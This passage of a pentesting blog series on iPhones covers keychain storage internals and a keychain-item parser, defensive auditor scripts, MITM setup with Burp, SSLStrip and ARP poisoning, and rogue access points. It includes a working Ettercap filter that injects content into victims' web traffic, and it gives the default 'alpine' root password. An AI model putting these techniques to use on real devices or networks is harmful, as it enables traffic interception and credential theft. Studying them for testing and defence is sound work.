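    return plistlib.dumps(obj, fmt=plistlib.FMT_XML).decode()


def find_sensitive(obj, path=""):
    """Recursively yield (key path, value) for string values under suspicious keys."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}/{key}" if path else str(key)
            lower = str(key).lower()
            if any(word in lower for word in SENSITIVE_KEY_WORDS) and isinstance(value, str):
                yield child, value
            yield from find_sensitive(value, child)
    elif isinstance(obj, list):
        for index, item in enumerate(obj):
            yield from find_sensitive(item, f"{path}[{index}]")


def audit(plist_bytes):
    """Return the findings for a plist given as raw bytes (binary or XML)."""
    return list(find_sensitive(plistlib.loads(plist_bytes)))


# Constructed sample: a preferences file that keeps a clear-text password and
# a session token next to harmless settings, stored in binary form as most
# applications do.
SAMPLE_PREFS = {
    "Year Of Birth": 1965,
    "Hobby": "Swimming",
    "Account": {"username": "alice", "Password": "hunter2",
                "sessionToken": "c0ffee"},
    "Jobs": ["Software engineer", "Salesperson"],
}
SAMPLE_BINARY = plistlib.dumps(SAMPLE_PREFS, fmt=plistlib.FMT_BINARY)

if __name__ == "__main__":
    print(to_xml(SAMPLE_BINARY))
    for key_path, value in audit(SAMPLE_BINARY):
        print(f"clear-text secret at {key_path!r}: {value!r}")
```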
<br />
<b>Keychain Storage </b><br />
<br />
<u>Keychain is an encrypted container (128 bit AES algorithm) and a centralized SQLite database that holds identities & passwords for multiple applications and network services, with restricted access rights. On the iPhone, keychain SQLite database is used to store the small amounts of sensitive data like usernames, passwords, encryption keys, certificates and private keys.</u> In general, iOS applications store the user’s credentials in the keychain to provide transparent authentication and to not prompt the user every time for login.<br />
<br />
iOS applications use the Keychain Services API:<br />
<br />
<ul>
<li><span style="color: purple;"><i>SecItemAdd</i></span></li>
<li><span style="color: purple;"><i>SecItemDelete</i></span></li>
<li><span style="color: purple;"><i>SecItemCopyMatching</i></span></li>
<li><span style="color: purple;"><i>SecItemUpdate</i></span></li>
</ul>
<br />
<b>Note:</b> These function names can be used in source code reviews to identify where sensitive data is handled.<br />
<br />
These functions are used to read and write data to and from the keychain. Developers leverage the Keychain Services API to have the operating system store sensitive data securely on their behalf, instead of storing it in a property list file or a plaintext configuration file. On the iPhone, the keychain SQLite database file is located at – <span style="color: purple;"><i>/private/var/Keychains/keychain-2.db</i></span>.<br />
<br />
The keychain contains a number of keychain items, and each keychain item has encrypted data and a set of unencrypted attributes that describe it. The attributes associated with a keychain item depend on the keychain item class (<i><span style="color: purple;">kSecClass</span></i>). In iOS, keychain items are classified into 5 classes – generic passwords (<i><span style="color: purple;">kSecClassGenericPassword</span></i>), internet passwords (<span style="color: purple;"><i>kSecClassInternetPassword</i></span>), certificates (<i><span style="color: purple;">kSecClassCertificate</span></i>), keys (<i><span style="color: purple;">kSecClassKey</span></i>) and digital identities (<i><span style="color: purple;">kSecClassIdentity, identity=certificate + key</span></i>). In the iOS keychain, all keychain items are stored in 4 tables – genp, inet, cert and keys (shown in Figure 1). The genp table contains generic password keychain items, the inet table contains Internet password keychain items, and the cert & keys tables contain certificates, keys and digital identity keychain items.<br />
<br />
<b>Keys hierarchy</b><br />
<b><br /></b>
Here is the keychain key structure:<br />
<br />
<ul>
<li>UID key : hardware key embedded in the application processor AES engine, unique for each device. This key can be used but not read by the CPU. Can be used from bootloader and kernel mode. Can also be used from userland by patching IOAESAccelerator.</li>
<li>UIDPlus key : new hardware key referenced by the iOS 5 kernel, does not seem to be available yet, even on newer A5 devices.</li>
<li>Key 0x835 : Computed at boot time by the kernel. Only used for keychain encryption in iOS 3 and below. Used as "device key" that protects class keys in iOS 4. key835 = AES(UID, bytes("01010101010101010101010101010101"))</li>
<li>Key 0x89B : Computed at boot time by the kernel. Used to encrypt the data partition key stored on Flash memory. Prevents reading the data partition key directly from the NAND chips. key89B = AES(UID, bytes("183e99676bb03c546fa468f51c0cbd49"))</li>
<li>EMF key : Data partition encryption key. Also called "media key". Stored encrypted by key 0x89B.</li>
<li>DKey : NSProtectionNone class key. Used to wrap file keys for "always accessible" files on the data partition in iOS 4. Stored wrapped by key 0x835.</li>
<li>BAG1 key : System keybag payload key (+initialization vector). Stored unencrypted in the effaceable area.</li>
<li>Passcode key : Computed from the user passcode or the escrow keybag BagKey using Apple's custom derivation function. Used to unwrap class keys from system/escrow keybags. Erased from memory as soon as the keybag keys are unwrapped.</li>
<li>Filesystem key (f65dae950e906c42b254cc58fc78eece) : used to encrypt the partition table and system partition (referred to as "NAND key" on the diagram).</li>
<li>Metadata key (92a742ab08c969bf006c9412d3cc79a5) : encrypts NAND metadata.</li>
</ul>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://wiki.iphone-dataprotection.googlecode.com/hg/ios4_encryption_hierarchy.svg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://wiki.iphone-dataprotection.googlecode.com/hg/ios4_encryption_hierarchy.svg" height="449" width="640" /></a></div>
<br />
<br />
<u>iOS 3 and below</u><br />
<u><br /></u>
16-byte IV - AES128(key835, IV, data + SHA1(data))<br />
<br />
<u>iOS 4</u><br />
<br />
version (0)|protection_class - AESWRAP(class_key, item_key) (40 bytes)|AES256(item_key, data)<br />
<br />
<u>iOS 5</u><br />
<br />
version (2)|protection_class|len_wrapped_key|AESWRAP(class_key, item_key) (len_wrapped_key bytes)|AES256_GCM(item_key, data)|integrity_tag (16 bytes)<br />
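The iOS 4 and iOS 5 layouts above can be parsed without any key material, which is enough to audit which protection class each item in the genp/inet tables uses. The following Python script is an added example (not from the original post or from the iphone-dataprotection project); the mapping from the protection_class number to the kSecAttrAccessible* constants is assumed from that project's scripts, and the item blobs are constructed:<br />

```python
"""Parse the on-disk layout of an iOS 4/5 encrypted keychain item.

Added example, not code from the original post. It splits an item blob into
the fields described above (version, protection class, wrapped item key,
ciphertext and, for iOS 5, the GCM tag) without decrypting anything, which is
enough to audit the accessibility class an item was stored under. The
protection-class numbering is assumed from the iphone-dataprotection scripts;
the sample blobs are constructed.
"""
import struct

# Assumed mapping of the protection_class field to kSecAttrAccessible*
# constants (as used by the iphone-dataprotection keychain scripts).
PROTECTION_CLASSES = {
    6: "kSecAttrAccessibleWhenUnlocked",
    7: "kSecAttrAccessibleAfterFirstUnlock",
    8: "kSecAttrAccessibleAlways",
    9: "kSecAttrAccessibleWhenUnlockedThisDeviceOnly",
    10: "kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly",
    11: "kSecAttrAccessibleAlwaysThisDeviceOnly",
}
# Classes whose class key is available even on a device that was never
# unlocked since boot; these give the passcode no protective effect.
ALWAYS_AVAILABLE = {8, 11}


def parse_keychain_item(blob):
    """Return the fields of a version 0 (iOS 4) or version 2 (iOS 5) item blob."""
    if len(blob) < 8:
        raise ValueError("blob too short for the version/protection_class header")
    version, protection_class = struct.unpack_from("<II", blob, 0)
    if version == 0:
        # iOS 4: fixed 40-byte AESWRAP(class_key, item_key), then AES-256 data.
        if len(blob) < 48:
            raise ValueError("truncated version 0 item")
        wrapped_key, ciphertext, tag = blob[8:48], blob[48:], None
    elif version == 2:
        # iOS 5: explicit wrapped-key length, AES-256-GCM data, 16-byte tag.
        (wrapped_len,) = struct.unpack_from("<I", blob, 8)
        if len(blob) < 12 + wrapped_len + 16:
            raise ValueError("truncated version 2 item")
        wrapped_key = blob[12:12 + wrapped_len]
        ciphertext = blob[12 + wrapped_len:-16]
        tag = blob[-16:]
    else:
        raise ValueError(f"unsupported keychain item version {version}")
    return {
        "version": version,
        "protection_class": protection_class,
        "class_name": PROTECTION_CLASSES.get(protection_class, "unknown"),
        "always_available": protection_class in ALWAYS_AVAILABLE,
        "wrapped_key": wrapped_key,
        "ciphertext": ciphertext,
        "tag": tag,
    }


def build_item(version, protection_class, wrapped_key, ciphertext, tag=b""):
    """Assemble a blob in the same layout; used here only to construct samples."""
    header = struct.pack("<II", version, protection_class)
    if version == 0:
        return header + wrapped_key + ciphertext
    return header + struct.pack("<I", len(wrapped_key)) + wrapped_key + ciphertext + tag


# Constructed samples: placeholder wrapped keys, ciphertext and tag bytes.
SAMPLE_IOS4 = build_item(0, 6, bytes(range(40)), b"\xaa" * 32)
SAMPLE_IOS5 = build_item(2, 8, bytes(range(40)), b"\xbb" * 24, b"\xcc" * 16)

if __name__ == "__main__":
    for label, blob in (("iOS 4 item", SAMPLE_IOS4), ("iOS 5 item", SAMPLE_IOS5)):
        item = parse_keychain_item(blob)
        print(label, item["class_name"], "always available:", item["always_available"])
```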
<b><br /></b>
<b>Keychain tools</b><br />
<b><br /></b>
<br />
<ol>
<li><a href="https://github.com/ptoomey3/Keychain-Dumper/blob/master/main.m">https://github.com/ptoomey3/Keychain-Dumper/blob/master/main.m</a></li>
<li><a href="https://code.google.com/p/iphone-dataprotection/downloads/detail?name=keychain_dump">https://code.google.com/p/iphone-dataprotection/downloads/detail?name=keychain_dump</a></li>
</ol>
<br />
<b><br /></b>
<b>Notes</b><br />
<b><br /></b>
In recent versions of iOS (4 & 5), keychain items are stored by default using the kSecAttrAccessibleWhenUnlocked data protection accessibility constant. However, data protection is effective only with a device passcode, which implies that sensitive data stored in the keychain is secure only when the user sets a complex passcode for the device. iOS applications cannot force the user to set a device passcode. So if iOS applications rely only on the Apple provided security, they can be broken whenever iOS security is broken.<br />
<b><br /></b>
<b>Epilogue</b><br />
<br />
iOS application security can be improved by understanding the shortcomings of the current implementation and writing one’s own implementation that works better. In the case of the keychain, iOS application security can be improved by using custom encryption (using the built-in crypto API) along with the data protection API when adding keychain entries. If custom encryption is implemented, it is recommended not to store the encryption key on the device.<br />
<b><br /></b>
<b>References:</b><br />
<br />
<ol>
<li><a href="http://appadvice.com/appnn/tag/privacy-issues">http://appadvice.com/appnn/tag/privacy-issues</a></li>
<li><a href="http://resources.infosecinstitute.com/pentesting-iphone-applications-2/">http://resources.infosecinstitute.com/pentesting-iphone-applications-2/</a></li>
<li><a href="http://cryptocomb.org/Iphone%20UDIDS.pdf">http://cryptocomb.org/Iphone%20UDIDS.pdf</a></li>
<li><a href="http://en.wikipedia.org/wiki/OpenFeint">http://en.wikipedia.org/wiki/OpenFeint</a></li>
<li><a href="http://resources.infosecinstitute.com/iphone-forensics/">http://resources.infosecinstitute.com/iphone-forensics/</a></li>
<li><a href="http://support.apple.com/kb/HT1766">http://support.apple.com/kb/HT1766</a></li>
<li><a href="http://stackoverflow.com/questions/6697247/how-to-create-plist-files-programmatically-in-iphone">http://stackoverflow.com/questions/6697247/how-to-create-plist-files-programmatically-in-iphone</a></li>
<li><a href="http://www.icanlocalize.com/site/tutorials/how-to-translate-plist-files/">http://www.icanlocalize.com/site/tutorials/how-to-translate-plist-files/</a></li>
<li><a href="http://www.macroplant.com/iexplorer/">http://www.macroplant.com/iexplorer/</a></li>
<li><a href="http://resources.infosecinstitute.com/iphone-penetration-testing-3/">http://resources.infosecinstitute.com/iphone-penetration-testing-3/</a></li>
<li><a href="http://sit.sit.fraunhofer.de/studies/en/sc-iphone-passwords-faq.pdf">http://sit.sit.fraunhofer.de/studies/en/sc-iphone-passwords-faq.pdf</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>
<h2 style="text-align: left;">The Hackers Guide To Dismantling IPhone (Part 2)</h2>
Published 2013-09-21.<br />
<b>Introduction</b><br />
<br />
This post is the second part of the series "<i>The Hackers Guide To Dismantling IPhone</i>" and describes how to perform all types of <u>network attacks on any iPhone</u>. It also explains how to set up the testing environment for hacking an iPhone. The iPhone provides developers with a platform to develop two types of applications:<br />
<br />
<ul>
<li>Web based applications – which use JavaScript, CSS and HTML5 technologies</li>
<li>Native iOS applications – which are developed using Objective-C and the Cocoa Touch API</li>
</ul>
This article mainly covers the pen testing methodology of native iOS applications. However, some of the techniques explained here can also be used with web-based iOS applications.<br />
<br />
A simulator does not provide the actual device environment, so all the penetration testing techniques explained in this article are specific to a physical device. iPhone 4 with iOS 5 (maybe iOS6) will be used for the following demonstrations.<br />
<br />
To perform pentesting we need to install a few tools on our device. These tools are not approved by Apple. Code signing restrictions in iOS do not allow us to install the required tools on the device. To bypass the code signing restrictions and run our tools we have to JailBreak the iPhone. JailBreaking gives us full access to the device and allows us to run code which is not signed by Apple. After JailBreaking, the required unsigned applications can be downloaded from Cydia.<br />
<br />
<b>Setting Up the testing environment</b><br />
<br />
In order to set up a decent testing environment you would have to:<br />
<br />
<ol>
<li>Have at your disposal a wireless network that does not have the wireless isolation feature enabled (wireless isolation does not allow communication between hosts within the same wireless network). If you use an iDevice to set up your testing network then you are screwed, since as far as I know iDevice wireless hotspots (e.g. iPhone tethering etc.) have that feature enabled by default.</li>
<li>Configure the proxy settings of your iDevice so that its traffic goes through a web proxy (for this post I am going to use the free version of Burp Proxy v1.5).</li>
</ol>
<div>
<div>
From Cydia, download and install the applications listed below:</div>
<div>
<ul>
<li>OpenSSH – Allows us to connect to the iPhone remotely over SSH</li>
<li>Adv-cmds – Comes with a set of process commands like ps, kill, finger…</li>
<li>Sqlite3 – SQLite database client</li>
<li>GNU Debugger – For run time analysis & reverse engineering</li>
<li>Syslogd – To view iPhone logs</li>
<li>Veency – Allows viewing the phone on the workstation with the help of a Veency client</li>
<li>Tcpdump – To capture network traffic on the phone</li>
<li>com.ericasadun.utlities – plutil to view property list files</li>
<li>Grep – For searching</li>
<li>Odcctools – otool, object file displaying tool</li>
<li>Crackulous – Decrypt iPhone apps</li>
<li>Hackulous – To install decrypted apps</li>
</ul>
</div>
</div>
<div>
The iPhone does not give us a terminal to look inside directories. After installing OpenSSH on the device, we can connect to the SSH server on the phone from any SSH client (e.g. PuTTY, CyberDuck, WinSCP). This gives us the flexibility to browse through folders and execute commands on the iPhone. An iPhone has two users by default: one is mobile and the other is root. All the applications installed on the phone run with mobile user privileges. But using SSH we can log into the iPhone as the root user, which gives us full access to the device. The default password for both user accounts (root, mobile) is alpine.</div>
<div>
<br /></div>
<div>
<b>Performing our first Man In The Middle attack</b></div>
<br />
In order to start capturing non-SSL traffic you have to change the settings on your iPhone; to do that, follow the steps below.<br />
<br />
<b>Step 1:</b> Go to Settings -> Wi-Fi. <br />
<br />
<b>Step 2: </b>HTTP Proxy -> Manual. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOdrZVn6VWOMHrrpnkv5PZ5LTimVZx3wOSYIHU5s_mQ3mUpm9ob9ywPPQzOp_tq8gIs2ZzX2JIlTo1nEqfKfeR3VSvWP3qkxWf27jvd0TLfdpgsnI_TrNW6MHlXAUEu_TnJMt8uuA7bi4/s1600/iPhoneProxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOdrZVn6VWOMHrrpnkv5PZ5LTimVZx3wOSYIHU5s_mQ3mUpm9ob9ywPPQzOp_tq8gIs2ZzX2JIlTo1nEqfKfeR3VSvWP3qkxWf27jvd0TLfdpgsnI_TrNW6MHlXAUEu_TnJMt8uuA7bi4/s1600/iPhoneProxy.png" height="89" width="320" /></a></div>
<br />
<b>Step 3:</b> Set the proxy IP to the IP address of the machine on which Burp Proxy is running.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP4whBQ4lINecjET17Mhxi3o2Tpl4Tz41hyZhj_iMsi_XqmQJxbPlEW4fsEMhvXSNnqszY5G_dLJkwEiLs3TjBEGC8KMvh0wDxZeKF7oGZaUmdHMu9FexKSqYu3Pmz2zkjVq_Hm1ATUNY/s1600/iPhoneProxy2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP4whBQ4lINecjET17Mhxi3o2Tpl4Tz41hyZhj_iMsi_XqmQJxbPlEW4fsEMhvXSNnqszY5G_dLJkwEiLs3TjBEGC8KMvh0wDxZeKF7oGZaUmdHMu9FexKSqYu3Pmz2zkjVq_Hm1ATUNY/s1600/iPhoneProxy2.png" height="246" width="320" /></a></div>
<br />
<b>Note:</b> Check out that the Authentication is disabled (we would not want to try to authenticate to our own web proxy).<br />
<br />
<b>Step 4:</b> Open Burp -> Proxy Tab<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirlbO3GlKsBvv63zJHavKVAJT6Jokq42I3uozcnvWOrmtaJmGZy_cfa0Bn9XxZ3PxXstnh0JFWmPz2WXGUiCANzDpy7IIAyWRtf4QPUX01X_Q2Qy2hMdYrcomhR5xii-RnhKJDAsQPLZs/s1600/Screen+Shot+2013-03-10+at+00.37.54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirlbO3GlKsBvv63zJHavKVAJT6Jokq42I3uozcnvWOrmtaJmGZy_cfa0Bn9XxZ3PxXstnh0JFWmPz2WXGUiCANzDpy7IIAyWRtf4QPUX01X_Q2Qy2hMdYrcomhR5xii-RnhKJDAsQPLZs/s1600/Screen+Shot+2013-03-10+at+00.37.54.png" height="173" width="320" /></a></div>
<br />
<br />
<b>Step 5:</b> Proxy Tab -> Options -> Set the listening IP to the interface that is reachable from the wireless network.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_FTzOAsnCE4qzGo8lbZT6Sit_ZHQ0Nd9zGroXvmz6KNJwFfWt2PPwoTPVWIdiK7rPac8_X1HNJ7nOZc3N-T5HvPBR3uHZi1SYoBneouYtOiEu8lQ7QMGIwy3Z85_e8XLzWuihaubRq64/s1600/Screen+Shot+2013-03-10+at+00.40.59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_FTzOAsnCE4qzGo8lbZT6Sit_ZHQ0Nd9zGroXvmz6KNJwFfWt2PPwoTPVWIdiK7rPac8_X1HNJ7nOZc3N-T5HvPBR3uHZi1SYoBneouYtOiEu8lQ7QMGIwy3Z85_e8XLzWuihaubRq64/s1600/Screen+Shot+2013-03-10+at+00.40.59.png" height="162" width="400" /></a></div>
<br />
<b>Step 6:</b> Proxy Tab -> Set the proxy to invisible and make sure it is in a running state.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPmumArwVrGHmIIhQrM1ZagOrH0LyLlWwgnPpBd3VilAeXLpnHRx9-IPZxP43m7BlzWeaOXW4J4S4htfmX1fJ1ENiOUWqEu6o7ScnezxHIlmT1U02GD2rB2t6mlEQ249Nm0e7vMAbdic/s1600/Screen+Shot+2013-03-10+at+00.43.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPmumArwVrGHmIIhQrM1ZagOrH0LyLlWwgnPpBd3VilAeXLpnHRx9-IPZxP43m7BlzWeaOXW4J4S4htfmX1fJ1ENiOUWqEu6o7ScnezxHIlmT1U02GD2rB2t6mlEQ249Nm0e7vMAbdic/s1600/Screen+Shot+2013-03-10+at+00.43.56.png" /></a></div>
<br />
<b>Note:</b> By doing this you will be able to capture all non-encrypted traffic. <u>A more realistic scenario would include an ARP poisoning attack first</u> (you should know, though, that wireless access points nowadays incorporate anti-ARP-poisoning countermeasures). Obviously the countermeasures have to be defeated.<br />
<br />
<b>HTTPS stripping attacks to SSL traffic</b><br />
<br />
Another type of MITM (Man In The Middle) attack targets encrypted connections (e.g. connections using SSL/TLS). This attack can be performed after a successful ARP poisoning attack, and it is obviously much more interesting since it involves sensitive data (e.g. credit cards, user names and passwords). The "<i>easiest</i>" way of performing this attack is by using SSLStrip.<br />
<br />
<b>Note:</b> <u>SSLStrip is used to perform HTTPS stripping attacks</u> (presented officially for the first time at Black Hat DC 2009). SSLStrip transparently hijacks HTTP traffic on a network. The free Burp Suite Proxy Edition 1.5 and above supports SSLStrip-like functionality.<br />
<br />
The options shown in the picture below may be used to <u>deliver sslstrip-like attacks</u>:<br />
<br />
<b>Step 1: </b>Proxy -> Options -> Response Modification<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYbsNTeaULbG-GbvANXueFn8k9AmAsEcAkkmzH3VtkzD7TlXyUCEbZVeGxKuO3g5lh_s4_kgGfMcix0MYZ60nvIW3_WLsiLJ9e8ICDBlKxdvXjcezHe0EZtIGuk4_LVqZRMWgl7NVGW_Q/s1600/Screen+Shot+2013-03-11+at+21.41.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYbsNTeaULbG-GbvANXueFn8k9AmAsEcAkkmzH3VtkzD7TlXyUCEbZVeGxKuO3g5lh_s4_kgGfMcix0MYZ60nvIW3_WLsiLJ9e8ICDBlKxdvXjcezHe0EZtIGuk4_LVqZRMWgl7NVGW_Q/s1600/Screen+Shot+2013-03-11+at+21.41.50.png" height="213" width="400" /></a></div>
<br />
<b>Note:</b> Obviously you can play around with the response modification menu and see how the client behaves in an sslstrip-like attack scenario, and also with the "remove secure flag from cookies" option. This type of attack is more of a user-oriented attack than an actual technical attack on SSL. It doesn't break the underlying cryptography or trust model. Another way to perform a Man In The Middle attack would be to use the sslsniff tool created by the same guy who wrote sslstrip (Moxie Marlinspike).<br />
<br />
This can be defeated by using HTTP Strict Transport Security (HSTS). The threats addressed by this HTTP response header are:<br />
<br />
1. Passive Network Attackers<br />
<br />
HSTS forces all access to go over end-to-end secure transport (without HSTS, mixed content is allowed). It fixes the problem of web sites that encrypt only the login process and not the cookie(s) created during login (the Secure flag does not protect against mixing encrypted with non-encrypted content).<br />
<br />
<b>Note:</b> Tool used to perform the attack: Firesheep - <a href="http://codebutler.com/firesheep/">http://codebutler.com/firesheep/</a><br />
<br />
2. Active Network Attackers<br />
<br />
A determined attacker can mount an active attack, either by impersonating a user's DNS server or, in a wireless network, by spoofing network frames or offering a similarly named evil twin access point. If the user is behind a wireless home router, an attacker can attempt to reconfigure the router using default passwords and other vulnerabilities. Some sites, such as banks, rely on end-to-end secure transport to protect themselves and their users from such active attackers. Unfortunately, browsers allow their users to easily opt out of these protections in order to remain usable.<br />
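When reviewing an application's backend, the two countermeasures discussed here (an HSTS policy and the Secure flag on session cookies) can be checked directly from the response headers. The script below is an added example, not code from the original post; the one-year max-age threshold is an assumption and the two sample responses are constructed:<br />

```python
"""Check HTTP responses for the defenses against sslstrip-style downgrades.

Added example, not code from the original post. It parses the
Strict-Transport-Security header and every Set-Cookie header of a response
and reports what an HTTPS-stripping proxy could take advantage of: no HSTS
policy, a short max-age, and session cookies without the Secure flag. The
threshold and the two sample responses are constructed for illustration.
"""

# Policies shorter than this are easy to outlast (assumed threshold; common
# guidance is one year).
MIN_MAX_AGE = 365 * 24 * 3600


def parse_hsts(value):
    """Parse an HSTS header value into its max-age and boolean directives."""
    policy = {"max-age": None, "includesubdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.lower()
        arg = arg.strip().strip('"')
        if name == "max-age" and arg.isdigit():
            policy["max-age"] = int(arg)
        elif name in ("includesubdomains", "preload"):
            policy[name] = True
    return policy


def parse_set_cookie(value):
    """Return (cookie name, attributes) for a Set-Cookie value; attribute names lowercased."""
    parts = [part.strip() for part in value.split(";")]
    name = parts[0].partition("=")[0]
    attrs = {}
    for part in parts[1:]:
        key, _, arg = part.partition("=")
        attrs[key.lower()] = arg if arg else True
    return name, attrs


def audit_response(headers):
    """headers: list of (name, value) pairs. Returns a list of finding strings."""
    findings = []
    hsts = [v for n, v in headers if n.lower() == "strict-transport-security"]
    if not hsts:
        findings.append("no Strict-Transport-Security header: the browser will follow plain-HTTP links")
    else:
        policy = parse_hsts(hsts[0])
        if policy["max-age"] is None or policy["max-age"] < MIN_MAX_AGE:
            findings.append("HSTS max-age shorter than %d seconds" % MIN_MAX_AGE)
        if not policy["includesubdomains"]:
            findings.append("HSTS does not cover subdomains")
    for n, v in headers:
        if n.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(v)
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure: it is sent over stripped HTTP")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly")
    return findings


# Constructed samples: a login response that protects only the login page,
# and the same response with the countermeasures discussed above.
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(response) or ["no findings"])
```

HSTS only takes effect after the browser has seen the header once over HTTPS, so the very first visit is still exposed unless the site is on the browser preload list.<br />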
<b><br /></b>
<b>Performing ARP Poisoning to your iPhone (not so easy)</b><br />
<b><br /></b>
The best possible way to perform your MITM attack is by using mature and well tested tools such as Ettercap. Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.<br />
<b><br /></b>
<b>Step 1: </b>Open a terminal as root, type ettercap -G and then scan for hosts. In this wireless network the identified hosts are shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGGKIbaIaLY3WITc6Dt9MEvW3cch_PsR6wyKTiRFPxcsrI0RjzaDo3tTlWwAoGodIgQ_XDB3W7499Oay-jHMcbqkUgPAj9c_CqUPXWrWY-qvMZSQ9-QhUHLaaxUkpr9PrlSnFCzqPy1tA/s1600/Screen+Shot+2013-03-14+at+20.39.01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGGKIbaIaLY3WITc6Dt9MEvW3cch_PsR6wyKTiRFPxcsrI0RjzaDo3tTlWwAoGodIgQ_XDB3W7499Oay-jHMcbqkUgPAj9c_CqUPXWrWY-qvMZSQ9-QhUHLaaxUkpr9PrlSnFCzqPy1tA/s1600/Screen+Shot+2013-03-14+at+20.39.01.png" height="337" width="400" /></a></div>
<b><br /></b>
<br />
<b>Step 2: </b>Alter the traffic in such a way so as to exploit the device.<b> </b>Here is an example ettercap filter that changes on the fly the traffic:<br />
<br />
<pre style="background-color: white; font-size: 12px; line-height: 15px;"><i><span style="color: purple;">if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}</span></i></pre>
<br />
The code should be pretty self explanatory. The # symbols are comments. The second "if" statement tells the filter to only work on TCP packets from source port 80, in other words coming from a web server. This test may still miss some images, but should get most of them. I'm also not sure about Ettercap's order of operation with AND (&&) and OR (||) statements, but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators, but this gave me compile errors). The "replace" function replaces the first parameter string with the second. Because of the way this string replacement works it will mangle image tags and insert the picture we desire into the web page's HTML before it returns it to the victim. The tags may end up looking something like the following:<br />
<br />
<i><span style="color: purple;">&lt;img src="http://www.irongeek.com/images/jollypwn.png" /images/original-image.jpg&gt;</span></i><br />
<br />
<b>Note:</b> The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The "msg" function just prints to the screen letting us know that the filter has fired off.<br />
<br />
Now that we sort of understand the basics of the filter, let's compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:<br />
<br />
<i><span style="color: purple;">etterfilter ig.filter -o ig.ef</span></i><br />
<br />
<b>Note:</b> This type of attack applies to all types of devices, but nowadays it is most important for mobile devices.<br />
<br />
<b>Performing an attack by setting up a rogue access point </b><br />
<b><br /></b>
Airsnarf is a simple rogue wireless access point setup utility designed to demonstrate how a rogue AP can steal usernames and passwords from public wireless hotspots. Airsnarf was developed and released to demonstrate an inherent vulnerability of public 802.11b hotspots--snarfing usernames and passwords by confusing users with DNS and HTTP redirects from a competing AP.<br />
<br />
In response to the threat posed by rogue access points, we've also developed a hot spot defense kit to assist users in detecting wireless attackers. HotSpotDK checks for changes in ESSID, MAC address of the access point, MAC address of the default gateway, and radical signal strength fluctuations. Upon detecting a problem, HotSpotDK notifies the user that an attacker may be on the wireless network. Currently HotSpotDK runs on Mac OS X and Windows XP.<br />
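A HotSpotDK-style check written for this post as an added example (not HotSpotDK's or Airsnarf's code, and not from the original article): it watches the ESSID, access point MAC, default gateway MAC and signal strength that a wireless client can observe locally, and alerts on the changes described above. A gateway MAC that changes while the network name stays the same is also how the ARP poisoning scenario of the previous section looks from the victim's side, so the same check covers both. The sample readings are constructed.

```python
"""
Client-side hotspot defense check in the style of HotSpotDK (added example,
not HotSpotDK's own code). It consumes periodic samples of what a wireless
client can observe locally and raises an alert when the network identity
changes or when the signal swings radically between samples.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Sample:
    t: int             # sample time, seconds since monitoring started
    essid: str         # network name the client is associated to
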